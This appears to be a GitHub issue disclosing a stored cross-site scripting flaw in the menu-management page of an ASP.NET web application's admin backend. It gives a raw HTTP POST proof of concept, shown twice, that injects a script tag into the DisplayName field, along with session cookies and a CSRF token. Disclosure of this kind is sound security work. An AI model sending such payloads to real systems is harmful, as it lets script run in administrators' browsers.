You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Background system management menu management Add menu exists to store xss
poc
`
POST /Menu/AddOrModify/ HTTP/1.1
Host: 192.168.3.129:10027
Content-Length: 137
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVlXBEMyXVoXGiey61SvYw8hAPIiz-fO2DBogX_l3Ziric_IafwZeUbK5-LuGS3DLnaH3wSg9JqdMvE89285GFU7vfQEDEtA8RU7UnNYSP2DrohBvaZcDyu2HY1xqEnwiTDi5bEXZxu0tymzd90Uy6eH-xU0avoSSVn1-YFnkpDJA
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:10027
Referer: http://192.168.3.129:10027/Menu/AddOrModify/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuX3r0TbTJJJ8LOhX5p3K0CP88Ip43crrOWClJ8I0d9fgVy2BhH1Cz5N7b02wkqQhs01DJv_YhMH6GiU_IzHDoD0vkCfXaX-59z3u3PiiO1qxVAL_5bkc2LO00C5-z_VVXd39BXFjbuv_XH5-ylgpgSpzNcLbT0mwBSZDCzKEHSagKkqwjEl29HJK5lHEDydivsekH_w5uA5QtNkql7ae8RMWLa8848P2-zWKqCMxiJ1cnTa5TDMI8bdb-JZOKOOFJukuEOeClSwylYE-ccI0dKiQD0a6fkhxghdNmISAqfcBLuK70tJHwk5ZxajHI_swebh9vSxXpOI2lBduBlJattOo3OHT25Krwpzw621AsZApX6bgBkxtj8VWW0o8ddbUmXbVAmF5UUVkdPbn8bZWFhCmmpPJ54tcwbJ19UeWc3BlcnOUeRqraNBICavaYsJjSWH3Z-c4JUtSTaOY_P1hxV4lRXUAQjfCIaEDirCUbrguTUwYfxNB6mABHrvVUPMAWUWSq8UaO4KH-l21qF3NUmD
Connection: close
Id=&Name=1111111111111a&DisplayName=%3Cscript%3Ealert(1)%3C%2Fscript%3E&IconUrl=&LinkUrl=&Sort=99&ParentId=0&IsSystem=true&IsDisplay=true
`
then you can view in bankground http://192.168.3.129:10027/Menu/LoadData/?page=1&limit=10
The text was updated successfully, but these errors were encountered:
Background system management menu management Add menu exists to store xss
poc
`
POST /Menu/AddOrModify/ HTTP/1.1
Host: 192.168.3.129:10027
Content-Length: 137
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVlXBEMyXVoXGiey61SvYw8hAPIiz-fO2DBogX_l3Ziric_IafwZeUbK5-LuGS3DLnaH3wSg9JqdMvE89285GFU7vfQEDEtA8RU7UnNYSP2DrohBvaZcDyu2HY1xqEnwiTDi5bEXZxu0tymzd90Uy6eH-xU0avoSSVn1-YFnkpDJA
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:10027
Referer: http://192.168.3.129:10027/Menu/AddOrModify/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuX3r0TbTJJJ8LOhX5p3K0CP88Ip43crrOWClJ8I0d9fgVy2BhH1Cz5N7b02wkqQhs01DJv_YhMH6GiU_IzHDoD0vkCfXaX-59z3u3PiiO1qxVAL_5bkc2LO00C5-z_VVXd39BXFjbuv_XH5-ylgpgSpzNcLbT0mwBSZDCzKEHSagKkqwjEl29HJK5lHEDydivsekH_w5uA5QtNkql7ae8RMWLa8848P2-zWKqCMxiJ1cnTa5TDMI8bdb-JZOKOOFJukuEOeClSwylYE-ccI0dKiQD0a6fkhxghdNmISAqfcBLuK70tJHwk5ZxajHI_swebh9vSxXpOI2lBduBlJattOo3OHT25Krwpzw621AsZApX6bgBkxtj8VWW0o8ddbUmXbVAmF5UUVkdPbn8bZWFhCmmpPJ54tcwbJ19UeWc3BlcnOUeRqraNBICavaYsJjSWH3Z-c4JUtSTaOY_P1hxV4lRXUAQjfCIaEDirCUbrguTUwYfxNB6mABHrvVUPMAWUWSq8UaO4KH-l21qF3NUmD
Connection: close
Id=&Name=1111111111111a&DisplayName=%3Cscript%3Ealert(1)%3C%2Fscript%3E&IconUrl=&LinkUrl=&Sort=99&ParentId=0&IsSystem=true&IsDisplay=true
`
then you can view in bankground
http://192.168.3.129:10027/Menu/LoadData/?page=1&limit=10
The text was updated successfully, but these errors were encountered: